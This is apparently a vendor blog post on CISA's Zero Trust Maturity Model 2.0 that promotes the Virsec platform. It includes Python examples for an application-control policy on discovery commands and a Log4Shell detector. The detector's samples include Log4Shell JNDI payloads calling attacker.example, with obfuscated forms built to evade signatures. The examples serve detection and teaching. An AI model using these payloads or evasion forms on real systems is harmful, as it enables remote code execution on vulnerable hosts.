Protecting Government Apps and Workloads from Zero-Day Cyber Threats

Date: October 24, 2023

In April 2023, CISA released Zero Trust Maturity Model Version 2.0, which added a fourth maturity stage (Initial, between Traditional and Advanced) and reaffirmed the threat-protection requirements for applications and workloads.

In this article we look at the Threat Protection function within the Applications and Workloads pillar across the four maturity stages, at the residual risk that remains at every stage, and at a solution to address that residual risk.

Here are the maturity stages for Threat Protection within the Applications and Workloads pillar.

Table 1: Application and Workload: Threat Protections

Maturity factor: App Workflow Integration
  • Traditional: Minimal integration
  • Initial: Basic integration (mission critical apps)
  • Advanced: Complete integration (all apps)
  • Optimal: Dynamic integration (all apps)

Maturity factor: Threat Scope
  • Traditional: Known threats
  • Initial: Known threats; some app-specific threats
  • Advanced: Known threats; some app-specific threats; targeted threats
  • Optimal: Real-time visibility; content-aware protections against sophisticated, app-specific attacks

Residual risks (at every maturity stage):
  1) Legacy – unsupported hardware, software and operating systems
  2) Zero-Day attacks

Moving through the maturity stages (left to right in Table 1) reduces the residual risk to your agency's applications and workloads at each step.

Two residual risks remain, however, regardless of the stage the agency reaches: legacy systems and Zero-Day attacks.

Legacy Systems

Legacy systems, in this article's context, are systems that cannot move through the maturity model because their vendor no longer supports them. Examples include Windows Server 2003, Windows Server 2008 R2, and Microsoft Exchange Server 2013.

Agencies may still have these systems deployed. Because no patches or supported mitigations come from the product or security vendors, adversaries can keep exploiting known vulnerabilities in them indefinitely, and they continue to discover new ones.

Traditional endpoint security (EDR, MDR, XDR) relies on detecting and responding after compromise, so it struggles to stop zero-day attacks before they gain persistence, and it is often not even available for an unsupported operating system. These attacks frequently force agencies into tough choices, such as turning off a compromised service mid-attack to block the active threat.

Legacy systems' endpoint risk can often be mitigated with technical compensating controls such as an inline Intrusion Prevention System (IPS) placed in front of the legacy hosts. IPS is highly effective against vulnerabilities with known signatures and scales across many endpoints, but because it relies on signature-based identification it leaves the host susceptible to Zero-Day attacks.

Zero-Day Attacks

A Zero-Day attack exploits a vulnerability that is not yet known to the vendor or to defenders, so no patch exists and no pattern (signature) has been written to match the tactics and techniques the attacker uses.

Enter Virsec

Virsec, a T-Rex partner, stands in the gap between Zero Trust functions and Zero-Day attacks. By protecting apps and workloads from unknown attacks, as shown below, Virsec closes the Zero-Day gap in the Zero Trust architecture.

Figure 1: Enter Virsec: Zero Trust Security Posture

Virsec Security Platform (VSP)

The Virsec Security Platform supports Application and Workload protection under Zero Trust Maturity Model 2.0. It does so through a set of complementary protection engines, shown below:

Figure 2: Virsec Security Platform (VSP)

Host Protection

The security engineer manages host protection through two tabs in the VSP web interface, Host Protection and Application Control Policies (ACP), as shown here:

Figure 3: Virsec Menu

The Host Protection table (shown below) lets the security engineer curate and refine the allowlist and apply application control policies. VSP also supports three states for each endpoint, Disabled, Protect, and Detect (Detect is highlighted in blue), which gives granular control for change control and acceptance during Zero Trust projects.

Figure 4: Host Protection Table

App Control Policies

In addition to the host protections in the Host Protection Table (above), VSP supports OS-specific, application-level protections through App Control Policies (ACPs). The security engineer may apply ACPs at the same time as host protections, or later, to limit the amount of change during a deployment.

The following screenshot shows one Linux and two Windows ACPs:

Figure 5: Linux and Windows ACP

For a complete list of supported Operating Systems, please refer to VSP2.8_CompatibilityGuide.pdf (virsec.com)

VSP ships with a variety of ACPs. To get a feel for the functionality, here is one of the out-of-the-box ACP templates: a Linux policy with a strict match protecting the native Linux route command:

Figure 6: Default ACP

Call Out: Commands such as route, arp, ping and ifconfig have valid uses for cyber and system staff, but they are also ideal living-off-the-land tools for an attacker's discovery phase when seeking targets.
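As an added example, not Virsec's or VSP's code, here is a minimal application-control policy evaluator in Python that captures the idea behind a strict-match ACP for discovery commands, together with the three host states (Disabled, Detect, Protect) described above. The policy layout, the event layout, the canonical binary paths and the sample process events are all constructed for the illustration.

```python
"""Added example (not Virsec/VSP code): a minimal application-control policy
(ACP) evaluator for network-discovery commands, with the three per-host
states Disabled, Detect and Protect.  The policy layout, the event layout
and the sample events are constructed for this illustration."""
import os
from dataclasses import dataclass

# Commands with legitimate admin use that also serve attacker discovery.
DISCOVERY_COMMANDS = {"route", "arp", "ping", "ifconfig", "ip", "netstat"}


@dataclass(frozen=True)
class ExecEvent:
    host: str
    user: str
    parent: str   # parent process image name, e.g. "sshd" or "java"
    exe: str      # fully resolved executable path
    argv: tuple


# Hypothetical strict-match policy for Linux hosts.
LINUX_ACP = {
    # Canonical path for each command: a same-named binary dropped in /tmp
    # or another writable directory does not match.
    "canonical_paths": {
        "route": "/sbin/route",
        "arp": "/usr/sbin/arp",
        "ping": "/bin/ping",
        "ifconfig": "/sbin/ifconfig",
        "ip": "/sbin/ip",
        "netstat": "/bin/netstat",
    },
    "allowed_users": {"root", "netops"},
    # Admin shells and schedulers may launch discovery commands; a web or
    # application server process (java, httpd, w3wp) never should.
    "allowed_parents": {"bash", "sh", "sshd", "cron"},
}


def evaluate(event, acp=LINUX_ACP):
    """Return (verdict, reason) for one exec event under the policy."""
    name = os.path.basename(event.exe)
    if name not in DISCOVERY_COMMANDS:
        return "allow", "not a discovery command"
    if event.exe != acp["canonical_paths"].get(name):
        return "deny", f"{name} run from non-canonical path {event.exe}"
    if event.user not in acp["allowed_users"]:
        return "deny", f"user {event.user} may not run {name}"
    if event.parent not in acp["allowed_parents"]:
        return "deny", f"{name} spawned by {event.parent}, not an admin shell"
    return "allow", "strict match"


def enforce(events, host_state, acp=LINUX_ACP):
    """Apply the policy under one host state.

    Disabled: nothing is evaluated.  Detect: violations are logged but the
    process still runs (useful during change control).  Protect: violations
    are blocked.  Returns a list of (event, verdict, reason, action).
    """
    if host_state == "Disabled":
        return [(e, "allow", "host protection disabled", "ran") for e in events]
    results = []
    for e in events:
        verdict, reason = evaluate(e, acp)
        if verdict == "allow":
            action = "ran"
        else:
            action = "blocked" if host_state == "Protect" else "ran (logged)"
        results.append((e, verdict, reason, action))
    return results


# Constructed sample events: an admin over SSH, a web application spawning
# discovery commands after exploitation, and a renamed copy of arp in /tmp.
SAMPLE_EVENTS = [
    ExecEvent("web01", "netops", "sshd", "/sbin/route", ("route", "-n")),
    ExecEvent("web01", "tomcat", "java", "/sbin/ifconfig", ("ifconfig",)),
    ExecEvent("web01", "tomcat", "java", "/bin/ping", ("ping", "-c1", "10.0.0.5")),
    ExecEvent("web01", "root", "bash", "/tmp/arp", ("arp", "-a")),
    ExecEvent("web01", "tomcat", "java", "/usr/bin/java", ("java", "-jar", "app.jar")),
]


def blocked_commands(events=SAMPLE_EVENTS, host_state="Protect"):
    """Names of the commands that were blocked under the given host state."""
    return [os.path.basename(e.exe)
            for e, _verdict, _reason, action in enforce(events, host_state)
            if action == "blocked"]


if __name__ == "__main__":
    for e, verdict, reason, action in enforce(SAMPLE_EVENTS, "Protect"):
        print(f"{e.host} {e.user:<7} {e.parent:<5} {e.exe:<15} {verdict:<5} {action:<12} {reason}")
```

The denials on the tomcat/java events are the interesting ones: the binary is the legitimate one at its canonical path, but an application-server process has no business spawning network discovery, which is exactly the post-exploitation step an attack against the application would take. Running the same events under Detect mode records the violations without blocking, which is how a host can be staged before being switched to Protect.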

Additional VSP Application Protections

VSP's Application Protection supplies added Zero Trust Application Protection (ZTAP) by automatically instrumenting the application workflow for multi-layer, in-line monitoring through the application stack. A Tomcat/Java stack, for example, exposes several layers and attack surfaces. VSP enables protection across those layers; here is an example protection stack from the VSP console:

Figure 7: Additional VSP Protections (Vulnerability Protection)

VSP in Action: a Log4j Attack Scenario

This section shows VSP in action against a Zero-Day style attack. The scenario uses Kali Linux to launch a Log4j (Log4Shell) attack against a Windows Server 2012 host. It covers both residual-risk cases at once: Zero-Day, and legacy, because the host has no supported malware or endpoint-protection stack available. (Simulating a true Zero-Day realistically is a chicken-and-egg problem now that Log4j has been mitigated, so the scenario runs with no host protections created specifically for Log4j.)

The following diagram shows how VSP stops the Log4j attack at multiple stages.

Figure 8: Virsec Security Platform (VSP) – Applied Security Compensating Controls to Log4j
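The Log4Shell lookup string also makes concrete the point made under Legacy Systems above: a signature-based IPS is only as good as the patterns it knows, and a signature for the literal JNDI prefix is bypassed by the obfuscated forms that Log4j's own lookup syntax allows. The following Python is an added example, not VSP code, and says nothing about how VSP itself instruments the application; it implements only the subset of Log4j 2 lookup evaluation that obfuscated payloads abuse (lower, upper, default values, nesting) to put the naive signature beside a check that resolves the lookups first. All sample inputs are constructed.

```python
"""Added example (not Virsec/VSP code): why a signature for the literal
Log4Shell JNDI prefix misses obfuscated variants, and how evaluating the
lookup syntax the way Log4j 2 does catches them.  Only the subset of Log4j 2
lookup syntax that obfuscated payloads abuse is implemented: ${lower:x},
${upper:x}, ${name:-default} default values, and nesting.  Samples are
constructed."""
import re

# The naive IPS-style signature: the literal JNDI lookup prefix.
SIGNATURE = re.compile(r"\$\{jndi:", re.IGNORECASE)

# An innermost lookup: ${...} whose body contains no further '${' or '}'.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")


def signature_match(text):
    """Signature check only: does the raw text contain '${jndi:'?"""
    return SIGNATURE.search(text) is not None


def _evaluate(body):
    """Evaluate one lookup body.  Returns the substituted text, or None when
    the lookup must be left in place (the jndi payload, or an unknown lookup)."""
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        return None                       # never resolve: this is the payload
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${env:NAME:-default} or ${::-x}: assume the variable is unset,
        # which is what the attacker relies on, and take the default.
        return body.split(":-", 1)[1]
    return None


def resolve_lookups(text, max_rounds=32):
    """Repeatedly substitute innermost lookups until nothing changes,
    so nested obfuscation collapses to the string Log4j would act on."""
    for _ in range(max_rounds):
        changed = False

        def substitute(match):
            nonlocal changed
            result = _evaluate(match.group(1))
            if result is None:
                return match.group(0)
            changed = True
            return result

        text = INNERMOST.sub(substitute, text)
        if not changed:
            break
    return text


def is_jndi_lookup(text):
    """Semantic check: resolve the obfuscation, then look for the JNDI prefix."""
    return signature_match(resolve_lookups(text))


# Constructed inputs: the plain payload, three obfuscated forms of the kind
# used to evade Log4Shell signatures, and a benign log line using a lookup.
SAMPLES = {
    "plain":    "${jndi:ldap://attacker.example/a}",
    "lower":    "${${lower:j}ndi:${lower:l}dap://attacker.example/a}",
    "defaults": "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://attacker.example/a}",
    "env":      "${${env:NaN:-j}ndi:ldap://attacker.example/a}",
    "benign":   "login ok for ${env:USER:-unknown} from 10.0.0.9",
}


def scan(samples=SAMPLES):
    """Return {name: (signature_hit, resolved_hit)} for each sample."""
    return {name: (signature_match(s), is_jndi_lookup(s))
            for name, s in samples.items()}


if __name__ == "__main__":
    for name, (sig, sem) in scan().items():
        print(f"{name:<9} signature={sig!s:<5} resolved={sem}")
```

Only the plain payload trips the signature; the three obfuscated forms sail past it yet collapse to the same `${jndi:ldap://...}` string once the lookups are resolved, while the benign line resolves to plain text and is not flagged. A defender relying on patterns alone has to keep chasing every new encoding, which is the gap the page describes for an unpatchable legacy host.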

Here is the Host Protection policy for the victim (attacked) host:

Figure 9: Host Protection policy for the attacked host

For Application and Workload protections, VSP protects at the host level and the web application level.

The incident log for VSP protecting the victim is shown here:

Figure 10: Incident Log for VSP

The attacker then sees the following output from the failed Log4j attempt:

Figure 11: Hacker Output Screen

Summary

The CISA Zero Trust Maturity Model 2.0 adds granularity to the model, but the inherent problems of Zero-Day exploits and of legacy systems with unpatchable vulnerabilities require added solutions and innovation. The Virsec Security Platform (VSP) fills the Zero-Day gap and narrows the widening gap in securing legacy systems through its built-in capabilities: stopping Zero-Day attacks, eliminating dwell time, and continuous run-time protection.

T-Rex's cybersecurity engineers and architects work with Federal agencies to accelerate their Zero Trust programs through T-Rex's Zero Trust Accelerator and innovative tooling such as that shown here. Contact us at cybersecurity@trexsolutionsllc.com to discuss how we can assist your Zero Trust program.

